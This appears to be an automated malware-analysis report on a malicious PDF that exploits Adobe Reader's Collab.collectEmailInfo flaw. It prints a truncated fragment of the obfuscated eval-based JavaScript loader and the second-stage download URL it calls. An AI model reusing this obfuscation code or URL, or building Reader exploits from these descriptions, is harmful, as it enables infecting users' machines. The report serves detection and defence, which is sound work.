Malicious PDF — malware analysis report

Static analysis result for SHA-256 aebff3feca949e42…

MALICIOUS

PDF

Size: 4.7 KB | Created: 2008-08-06 01:42:27 | Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) | First seen: 2026-05-08
MD5: 49d9f67901e82236efea8ea5920a46ab
SHA-1: aec5224a3cb64ab3d45bd7f1f20a71f807392916
SHA-256: aebff3feca949e4212da913e31f538a69828d74f285ca182d9d6a8147ab92039
Risk score: 308

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript with multiple heuristic firings indicating obfuscation and eval() calls. The embedded JavaScript is likely designed to download and execute a second-stage payload. The obfuscated nature of the script prevents a more detailed analysis of its specific actions.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (8)

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function pA7Si9y(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function tIkH661u(U1yVu){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(U1yVu)"+";"+"}");eval("function zjnKtBtp(JAIngSR7){var TjNMdU="+"0,rcB3C=JAIngSR7.l"+"en"+"gth,zx7LQLAm6y7y0=10"+"2"+"4,N9JyR7ftXl5ZO,ha6UYCqyY1k,qrb0qPIANjG3dn='',qMDxxn4SMGIK=TjNMdU,Y5SIv4Sm=TjNMdU,owqTDt71ioNv=TjNMdU,vjpn666P=Ar"+"ra"+"y(63,51,19,31,45,13,27,32,14,24,0,0, …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/exp/load.php?id=7856&spl=4 Referenced by PDF JavaScript

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x365 | 6429 bytes
SHA-256: 6c44f45553e2b3fbb8c4c853e505c561042e4f8f5b5069790dde02832074bdd9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 124 of 229 identifiers look randomly generated (e.g. 'jW3suaVqNW3hja8KIW3sut8KuW3hNUwNjW3hNU'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (sixbit-xor-table) from JavaScript object 13 at offset 0x365 | 2619 bytes
SHA-256: e69caf21e7aea0db81c30c597d1c3cc486c8bc82847270a0df69e16ad577eefb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script